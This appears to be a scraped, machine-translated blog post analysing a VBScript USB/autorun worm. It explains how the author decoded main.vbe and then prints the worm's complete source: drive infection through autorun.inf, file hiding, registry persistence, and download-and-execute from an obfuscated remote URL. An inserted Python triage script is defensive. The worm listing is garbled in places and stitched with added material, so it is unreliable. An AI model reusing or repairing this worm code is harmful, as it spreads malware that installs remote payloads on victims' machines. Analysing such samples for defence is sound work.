Simple Analysis of a script Virus

Source: Internet
Author: User

Recently, colleagues in my office reported that their machines were inexplicably infected with a virus. I did not pay much attention until my own machine caught it, hence this post.

One evening we were working late in a hurry when someone suddenly shouted, "Why is my CPU usage so high?" Opening a process viewer showed wscript.exe busy running a main.vbe. Why would a script be running on its own? It had to be an infection, probably the notorious office virus... and unfortunately it had found us. Let's start the dissection!

For this script virus our quick fix was to disable the VBScript engine: run "regsvr32 -u vbscript.dll" and the CPU goes quiet.

Now open main.vbe. It sits in the root of the C: drive; first clear the script's hidden and system attributes, then open it in Notepad. It is all garbled! The old trick: the body is encoded so the victim cannot read it, nothing clever about it. But to run, the script has to decode itself, and sure enough, after the dense garbled text comes an Execute(thistext). Isn't thistext the decoded virus body? Fine, write it out: replace Execute(thistext) with
Dim fso, MyFile
' Dump the decoded script body to a file instead of executing it
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.CreateTextFile("c:\testfile.txt", True)
MyFile.WriteLine(thistext)
MyFile.Close
Re-register vbscript.dll, run the modified script, and the virus appears in plaintext. Code:
Ver = "3.0"
Tile = "daxian" & ver
About = "daxianbiyele 2007.7.11"
Fromurl = chr (104) & chr (116) & chr (116) & chr (112) & ": //" & chr (104) & chr (103) & "z. "& chr (100) &" in "& chr (103) & chr (104) &" ui123. "& chr (99) &" n/wan. "& chr (97) &" s "& chr (112)
On error resume next
Dim wsh
Dim WshShell
Set Wsh = CreateObject ("WScript. Shell ")
Set WshShell = Wscript. CreateObject ("Wscript. Shell ")
Set FSO = CreateObject ("Scripting. FileSystemObject ")
Set dir = FSO. GetSpecialFolder (1)
Set dc = FSO. Drives
Ouwnname = Wscript. ScriptName
Mulu = left (Wscript. ScriptFullName, len (Wscript. ScriptFullName)-len (Wscript. ScriptName ))
If mulu = dir & "" then sys = true
For Each d In dc
If mulu = d & "" then opendisk = WshShell. Run ("explorer" & d, 3, false)
Next
If not sys = true then
Wscript. sleep 2000
Set y = getobject ("winmgmts: \. ootcimv2 ")
Set x=y.exe cquery ("select * from win32_process where name1_wscript.exe ")
I = 0
For each j in x
I = I + 1
Next
If I> 1 then wscript. quit
End if
Yincang
If fso. FileExists (mulu & "autorun. inf") Then
If readtxt (mulu & "autorun. inf", 1) <> tile then
Buildinf ver, "72.1611.exe", now
End If
Else
Buildinf ver, "72.1611.exe", now
End If
Copyexe = readtxt (mulu & "autorun. inf", 7)
Randomize
Sjs = int (Rnd * (31-1 + 1) + 1
If fso. FileExists (mulu & copyexe) and Day (Date) <> sjs then
If sys = true then WshShell. run mulu & copyexe
Else
Ldownver = readtxt (mulu & "autorun. inf", 5)
Downfile mulu & "temp.txt", fromurl, 0
Set OpenFile = FSO. OpenTextFile (mulu & "temp.txt", 1)
Nouse = OpenFile. ReadLine
Downis = OpenFile. ReadLine
Downver = OpenFile. ReadLine
Downname = month (Date) & "+" & Day (Date) & ". exe"
Downfrom = OpenFile. ReadLine
Vbsver = OpenFile. ReadLine
Vbsname = OpenFile. ReadLine
Vbsurl = OpenFile. ReadLine
Guanggao = OpenFile. ReadLine
OpenFile. Close
FSO. DeleteFile (mulu & "temp.txt ")
If downis = 1 then
If vbsver <> ver then
Downfile mulu & vbsname, vbsurl, 1
Wscript. quit
End if
If downver <> Ldownver then
Downfile mulu & downname, downfrom, 0
Buildinf downver, downname, guanggao
End if
End if
End If
Copyexe = readtxt (mulu & "autorun. inf", 7)
If sys = true then
Ganran ()
WshShell. run mulu & ouwnname
Else
Shuxing mulu & ouwnname, 2 + 4
Copyvbs dir & "main. vbe"
Copyvbs dir & "main.txt"
CopyFile mulu & "autorun. inf", dir & "autorun. inf"
CopyFile mulu & copyexe, dir & "& copyexe
Shuxing dir & "& copyexe, 2 + 4
If mulu <> "C:" then
Copyvbs "c: main. vbs"
CopyFile mulu & "autorun. inf", "c: autorun. inf"
CopyFile mulu & copyexe, "c:" & copyexe
End if
Zhuce
WshShell. run dir & "main. vbe"
End if
Function copyfile (file, where)
Shuxing where, 0
If fso. FileExists (file) then FSO. CopyFile file, where, True
End function
Function copyvbs (where)
Shuxing where, 0
Set self = fso. opentextfile (mulu & ouwnname, 1)
Vbscopy = self. readall
Self. close
Set vbs = fso. CreateTextFile (where, True)
Vbs. write vbscopy
Vbs. close
Shuxing where, 2 + 4
End function
Function zhuce ()
RegPath = "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerun"
Type_Name = "REG_SZ"
Key_Name = "explorer"
Key_Data = "main. vbe"
WshShell. RegWrite RegPath & Key_Name, Key_Data, Type_Name
End function
Function yincang ()
RegPath = "hkey_current_usersoftwaremicrosoftwindowscurrentversionpoliceradvanced"
Type_Name = "REG_DWORD"
Key_Name = "ShowSuperHidden"
Key_Data = "00000000"
WshShell. RegWrite RegPath & Key_Name, Key_Data, Type_Name
End function
Function buildinf (exever, exename, adv)
Shuxing mulu & "autorun. inf", 0
Set ini = fso. CreateTextFile (mulu & "autorun. inf", True)
Ini. writeline tile
Ini. writeline "[AutoRun]"
Ini. writeline about
Ini. writeline "openjavaswscript.exe. main. vbs"
Ini. writeline exever
Ini. writeline "shellopen = open (& O )"
Ini. writeline exename
Ini. writeline "shellopenCommand=WScript.exe. main. vbs"
Ini. writeline "shellopenDefault = 1"
Ini. writeline adv
Ini. close
Shuxing mulu & "autorun. inf", 1 + 2 + 4
End function
Function readtxt (where, line)
Set readfile = fso. OpenTextFile (where, 1)
I = 0
Do while I <line
I = I + 1
RLine = readfile. ReadLine
Loop
Readfile. Close
Readtxt = RLine
End function
Function shuxing (file, change)
If fso. FileExists (file) then
Set oFile = FSO. GetFile (file)
OFile. Attributes = change
Set oFile = Nothing
End if
End function
Function downfile (localfile, urlfile, runfile)
Shuxing localfile, 0
ILocal = LCase (localfile): iRemote = LCase (urlfile ):
If 1 = 2 then Wscript. echo "Impossible! "
Set xPost = CreateObject ("Microsoft. XMLHTTP ")
If 1 = 2 then Wscript. echo "Impossible! "
XPost. Open "get", iRemote, 0
If 1 = 2 then Wscript. echo "Impossible! "
XPost. Send ()
If 1 = 2 then Wscript. echo "Impossible! "
Set sGet = CreateObject ("ADODB. Stream ")
If 1 = 2 then Wscript. echo "Impossible! "
SGet. Mode = 3
If 1 = 2 then Wscript. echo "Impossible! "
SGet. Type = 1
If 1 = 2 then Wscript. echo "Impossible! "
SGet. Open ()
If 1 = 2 then Wscript. echo "Impossible! "
SGet. Write (xPost. responseBody)
If 1 = 2 then Wscript. echo "Impossible! "
SGet. SaveToFile iLocal, 2
If 1 = 2 then Wscript. echo "Impossible! "
Shuxing localfile, 2 + 4
If runfile = 1 then Wsh. run iLocal
End function
Function ganran ()
Do
For Each d In dc
If d. DriveType = 3 or (d. DriveType = 1 and d <> "A:" and d <> "B:") Then
If fso. FileExists (d & "main. vbs") and fso. FileExists (d & "autorun. inf") then
If readtxt (d & "autorun. inf", 1) <> tile then
CopyFile dir & "autorun. inf", d & "autorun. inf"
CopyFile dir & "& copyexe, d &" & copyexe
CopyFile dir & "main.txt", d & "main. vbs"
End if
Else
CopyFile dir & "autorun. inf", d & "autorun. inf"
CopyFile dir & "& copyexe, d &" & copyexe
CopyFile dir & "main.txt", d & "main. vbs"
End if
End If
Next
Wscript. sleep 2000
Loop
End function
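Two pieces of the listing above are worth automating when triaging a sample like this one: the chr(n) concatenation that hides the download URL (the fromurl line), and the fixed autorun.inf layout that buildinf() writes and the worm itself reads back with readtxt() (line 1 marker, line 5 payload version, line 7 name of the dropped .exe). The Python below is an added example, not code from the post; the sample URL and autorun.inf are constructed, and the exact form of the open= lines is assumed because the listing's version is garbled.

```python
import re

# Tokens of a VBScript string-building expression: chr(n) calls, "literals" and & joins.
_TOKEN = re.compile(r'chr\s*\(\s*(\d+)\s*\)|"([^"]*)"|(&)', re.IGNORECASE)

def decode_chr_concat(expr: str) -> str:
    """Statically evaluate an expression built only from chr(n), "literal" and &,
    the way the worm hides its download URL, without running any script."""
    out = []
    for m in _TOKEN.finditer(expr):
        if m.lastindex == 1:
            out.append(chr(int(m.group(1))))   # chr(104) -> "h"
        elif m.lastindex == 2:
            out.append(m.group(2))             # quoted literal, kept verbatim
        # lastindex == 3 is the & operator: it joins and adds nothing
    return "".join(out)

# Marker prefix the worm writes to line 1 of autorun.inf (tile = "daxian" & ver).
AUTORUN_MARKER = "daxian"

def triage_autorun(text: str) -> dict:
    """Pull the indicators out of an autorun.inf written by buildinf(), or return {}.
    Positions follow the worm's own readtxt() calls: line 1 marker, line 5 payload
    version, line 7 name of the dropped executable."""
    lines = text.splitlines()
    if len(lines) < 7 or not lines[0].lower().startswith(AUTORUN_MARKER):
        return {}
    runs_wscript = any("wscript.exe" in ln.lower() and "main.vbs" in ln.lower()
                       for ln in lines)
    return {"marker": lines[0], "version": lines[4],
            "dropped_exe": lines[6], "runs_wscript": runs_wscript}

# Constructed sample: a URL hidden like the fromurl line (host is a placeholder).
OBFUSCATED_URL = ('chr(104) & chr(116) & chr(116) & chr(112) & "://" & "example" '
                  '& chr(46) & "invalid" & "/wan" & chr(46) & "asp"')

# Constructed sample in the layout buildinf() writes; the open= lines are assumed.
SAMPLE_AUTORUN = r"""daxian3.0
[AutoRun]
daxianbiyele 2007.7.11
open=wscript.exe .\main.vbs
3.0
shell\open=open(&O)
72.1611.exe
shell\open\Command=WScript.exe .\main.vbs
shell\open\Default=1
2007-7-11 21:30:00"""

if __name__ == "__main__":
    print("download URL:", decode_chr_concat(OBFUSCATED_URL))
    print("autorun.inf indicators:", triage_autorun(SAMPLE_AUTORUN))
```

Run triage_autorun over the autorun.inf of every removable and fixed drive the worm's ganran() loop targets; a hit tells you which dropped .exe to remove alongside main.vbs.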
Ha, the temporary workaround is above; I have had no time to interpret this virus fully. Experts, please suggest a complete solution! Back to work...
